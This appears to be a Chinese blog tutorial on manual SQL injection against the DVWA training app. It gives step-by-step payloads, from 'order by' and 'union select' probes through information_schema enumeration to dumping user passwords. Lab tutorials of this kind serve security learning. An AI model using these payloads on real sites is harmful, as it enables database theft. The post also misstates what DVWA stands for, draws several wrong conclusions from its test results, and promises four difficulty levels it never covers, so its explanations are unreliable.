博客
关于我
DVWA--SQL Injection(非盲注)--四个级别
阅读量:209 次
发布时间:2019-02-28

本文共 2372 字,大约阅读时间需要 7 分钟。

SQL 注入测试与渗透:DVWA 框架下的手动注入流程

SQL 注入是一种Web安全中的常见漏洞,攻击者通过向应用程序中输入恶意的SQL语句,破坏现有的查询逻辑,从而执行恶意操作。SQL注入漏洞能够导致数据库信息泄露、数据篡改甚至整个数据库的“脱库”,因此被广泛认为是Web安全中的高风险问题。

本文将基于DVWA( Dependency-Conflict Vulnerability Assessment )框架,逐步讲解手动SQL注入测试的过程,涵盖从低级别到高级别的测试方法,以及如何利用这些漏洞进行数据库渗透。


1. 判断注入类型:数字型 vs 字符型

在手动SQL注入中,首先需要判断注入类型,即注入是基于数字型还是字符型。以下是一些常见的测试方法:

  • 数字型注入

    • 输入 1,页面正常返回,表明注入点可能存在数字型漏洞。
    • 输入 1 and 1=2,页面异常或返回错误,说明可能存在数字型注入。
    • 输入 1' and '1'='1,页面异常或返回错误,说明字符型注入可能存在。
  • 字符型注入

    • 输入 1' and '1'='1,页面正常返回,表明注入点可能存在字符型漏洞。
    • 输入 1' and '1'='2,页面异常或返回错误,说明字符型注入可能存在。

通过以上测试,可以初步判断注入类型,并为后续操作做好准备。


2. 猜解字段数量

接下来需要确定SQL查询语句中所涉及的字段数量。可以通过以下方法进行测试:

  • 使用 ORDER BY

    • 输入 1 order by 1,页面正常返回,说明至少有一个字段。
    • 输入 1 order by 2,页面正常返回,说明至少有两个字段。
    • 输入 1 order by 3,页面异常返回,说明字段数量小于3。
  • 使用 UNION SELECT

    • 输入 1 union select 1,页面异常返回,说明至少有两个字段。
    • 输入 1 union select 1,2,页面正常返回,说明至少有两个字段。
    • 输入 1 union select 1,2,3,页面异常返回,说明字段数量小于3。

通过以上方法,可以准确判断出SQL查询语句中涉及的字段数量,为后续注入操作提供依据。


3. 确定可注入字段位置

接下来需要确定哪些字段位置可以进行注入利用。可以通过以下方法实现:

  • 使用 UNION SELECT
    • 输入 1' and 1=2 union select 1,2,页面正常返回,说明两个字段位置都可以注入利用。
    • 输入 1' and 1=2 union select 1,3,页面异常返回,说明第三个字段位置不可注入。

通过观察返回的数据,可以判断哪些字段位置可以利用注入点,进而制定后续操作策略。


4. 查询当前使用的数据库

在SQL注入过程中,通常需要获取当前使用的数据库信息。可以通过以下方法实现:

  • 使用 UNION SELECT database()

    • 输入 1' and 1=2 union select database(),页面正常返回,显示当前数据库名称(如 dvwa)。
  • 查询所有数据库

    • 输入 1' and 1=2 union select table_schema from information_schema.tables,页面正常返回,列出所有数据库名称。

通过以上方法,可以获取当前使用的数据库信息,为后续操作提供重要数据支持。


5. 查询数据库中的表

在掌握数据库名称后,需要查询数据库中的所有表信息。可以通过以下方法实现:

  • 获取当前数据库中的表

    • 输入 1' and 1=2 union select table_name from information_schema.tables where table_schema=database(),页面正常返回,列出当前数据库中的所有表名称。
  • 获取所有数据库中的表

    • 输入 1' and 1=2 union select table_name from information_schema.tables,页面正常返回,列出所有数据库中的表名称。

通过以上方法,可以获取目标数据库中的表信息,为后续操作提供数据支持。


6. 查询表中的字段

在掌握表名称后,需要查询表中的字段信息。可以通过以下方法实现:

  • 获取当前表中的字段
    • 输入 1' and 1=2 union select column_name from information_schema.columns where table_name='users',页面正常返回,列出指定表中的字段名称。

通过以上方法,可以获取表中的字段信息,为后续注入操作提供重要数据支持。


7. 查询字段的具体值

在掌握字段名称后,需要查询字段的具体值。可以通过以下方法实现:

  • 获取用户信息

    • 输入 1' and 1=2 union select user_id, first_name, last_name from users,页面正常返回,列出用户信息。
  • 获取密码信息

    • 输入 1' and 1=2 union select user_id, password from users,页面正常返回,列出用户账号和密码。

通过以上方法,可以获取字段的具体值,完成数据库渗透。


8. 总结与建议

通过以上步骤,可以逐步完成SQL注入测试的整个流程。需要注意以下几点:

  • 测试环境的准备:确保测试环境的安全性,避免对生产环境造成影响。
  • 工具的选择:手动注入工具的选择可以根据具体需求进行调整,如使用 sqlmap 等自动化工具。
  • 防护措施:了解并遵守Web应用的安全最佳实践,减少SQL注入漏洞的发生概率。
  • 通过以上方法,可以在DVWA框架中安全地进行SQL注入测试,并掌握数据库渗透的关键技术。

    转载地址:http://shqi.baihongyu.com/

    你可能感兴趣的文章
    Nginx + uWSGI + Flask + Vhost
    查看>>
    Nginx - Header详解
    查看>>
    Nginx Location配置总结
    查看>>
    Nginx upstream性能优化
    查看>>
    Nginx 中解决跨域问题
    查看>>
    Nginx 动静分离与负载均衡的实现
    查看>>
    Nginx 反向代理 MinIO 及 ruoyi-vue-pro 配置 MinIO 详解
    查看>>
    Nginx 反向代理解决跨域问题
    查看>>
    Nginx 反向代理配置去除前缀
    查看>>
    nginx 后端获取真实ip
    查看>>
    Nginx 学习总结(17)—— 8 个免费开源 Nginx 管理系统,轻松管理 Nginx 站点配置
    查看>>
    nginx 常用配置记录
    查看>>
    Nginx 我们必须知道的那些事
    查看>>
    Nginx 的 proxy_pass 使用简介
    查看>>
    Nginx 的配置文件中的 keepalive 介绍
    查看>>
    Nginx 负载均衡与权重配置解析
    查看>>
    Nginx 负载均衡详解
    查看>>
    nginx 配置 单页面应用的解决方案
    查看>>
    nginx 配置~~~本身就是一个静态资源的服务器
    查看>>
    Nginx下配置codeigniter框架方法
    查看>>